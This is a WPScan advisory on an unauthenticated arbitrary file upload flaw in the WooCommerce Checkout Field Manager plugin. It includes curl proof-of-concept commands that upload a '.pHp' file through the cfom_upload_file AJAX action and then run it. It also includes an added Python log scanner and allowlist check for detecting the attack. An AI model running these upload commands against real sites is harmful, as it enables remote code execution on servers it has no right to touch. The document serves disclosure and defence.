Source: wpvulndb
Author: cydave
WPVDB-ID: 4DC72CD2-81D7-4A66-86BD-C9CFAF690EED
Published: Feb 13, 2023

WooCommerce Checkout Field Manager < 18.0 - Unauthenticated Arbitrary File Upload

Site: wpscan.com
Tags: woocommerce, checkout field manager, unauthenticated, arbitrary file upload, vulnerable plugin

EPSS: 0.202 (Low), percentile 96.4%

The plugin does not validate the files it accepts for upload, which allows unauthenticated attackers to upload arbitrary files, such as PHP scripts, to the server and then execute them by requesting them from the uploads directory.

PoC

1. Install and activate WooCommerce (dependency, no setup required).
2. Install and activate the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2).
3. Prepare the payload (the PHP payload body is not reproduced here): echo '' > /tmp/payload.php
4. Invoke the following curl command to upload the payload (notice the name parameter is set to ".pHp"):
   curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name=payload.pHp' -F 'file=@/tmp/payload.php'
5. Trigger the payload: curl -i 'http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php'
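Added example (not code from WPScan or from the plugin): a Python script that scans web server access-log lines for the two request shapes in the PoC above, an upload through admin-ajax.php?action=cfom_upload_file whose name parameter carries a PHP-executable extension in any letter case (the ".pHp" trick), and a later fetch of a PHP file from /wp-content/uploads/cfom_files/. It also shows the allowlist-style filename check the vulnerable handler lacked. The log lines are constructed, and the allowlist contents, the label names and the set of executable extensions are assumptions for the example, not facts from the advisory.

```python
"""Detect exploitation of the unauthenticated cfom_upload_file endpoint in
access logs and show the filename validation the handler should have done.
Added example; not code from the plugin or from WPScan. Sample log lines
are constructed for illustration."""
import re
from typing import Any, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Extensions commonly mapped to the PHP handler. Comparison is done on the
# lower-cased name, so mixed-case variants such as ".pHp" are caught.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phps", "phtml", "phar"}

# Allowlist a checkout-field upload could reasonably be restricted to.
# Assumption for this example; the plugin's fixed allowlist is not on the page.
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

UPLOAD_ACTION = "cfom_upload_file"              # AJAX action named in the PoC
UPLOAD_DIR = "/wp-content/uploads/cfom_files/"  # where the PoC retrieves the file

# Apache/nginx "combined" log format; fields after the status are not needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def extensions(name: str) -> List[str]:
    """Every extension of a file name, lower-cased: 'shell.PhP.jpg' -> ['php', 'jpg']."""
    base = name.rsplit("/", 1)[-1]
    return [p.lower() for p in base.split(".")[1:]]


def is_executable_name(name: str) -> bool:
    """True if any extension (not only the last) is one PHP would execute.
    Checking all extensions is deliberately conservative: some handler
    configurations execute 'shell.php.jpg'."""
    return any(ext in EXECUTABLE_EXTS for ext in extensions(name))


def is_allowed_name(name: str) -> bool:
    """The validation the vulnerable handler lacked: exactly one extension,
    drawn from the allowlist, compared case-insensitively."""
    exts = extensions(name)
    return len(exts) == 1 and exts[0] in ALLOWED_EXTS


def parse_line(line: str) -> Optional[Dict[str, Any]]:
    """Split one access-log line into its fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec: Dict[str, Any] = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def classify(line: str) -> Optional[str]:
    """Label a request: 'upload-exec' (upload with an executable name),
    'upload' (any other upload through the endpoint), 'exec-request'
    (a fetch of a PHP file from the upload directory), or None."""
    rec = parse_line(line)
    if rec is None:
        return None
    path, query = rec["path"], rec["query"]
    if path.endswith("/wp-admin/admin-ajax.php") and query.get("action") == UPLOAD_ACTION:
        return "upload-exec" if is_executable_name(query.get("name", "")) else "upload"
    if UPLOAD_DIR in path and is_executable_name(path):
        return "exec-request"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (label, client ip, request target, status) for every suspicious line."""
    findings = []
    for line in lines:
        label = classify(line)
        if label is not None:
            rec = parse_line(line)
            assert rec is not None
            findings.append((label, rec["ip"], rec["target"], rec["status"]))
    return findings


# Constructed sample log: one exploitation sequence mirroring the PoC, one
# benign upload through the same endpoint, and one unrelated admin-ajax call.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Feb/2023:10:01:02 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=cfom_upload_file&name=payload.pHp HTTP/1.1" 200 57 "-" "curl/7.88.1"',
    '203.0.113.7 - - [13/Feb/2023:10:01:05 +0000] "GET /wp-content/uploads/cfom_files/payload.php'
    ' HTTP/1.1" 200 1843 "-" "curl/7.88.1"',
    '198.51.100.4 - - [13/Feb/2023:10:02:00 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=cfom_upload_file&name=receipt.pdf HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Feb/2023:10:03:00 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The point of lower-casing before comparing is the one the PoC relies on: a blocklist that rejects ".php" but not ".pHp" is bypassed trivially, whereas an allowlist compared case-insensitively is not. On the server side, a filename check alone is not the whole fix: because the endpoint is reachable unauthenticated, the upload action also needs a nonce and capability check before any file is written.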

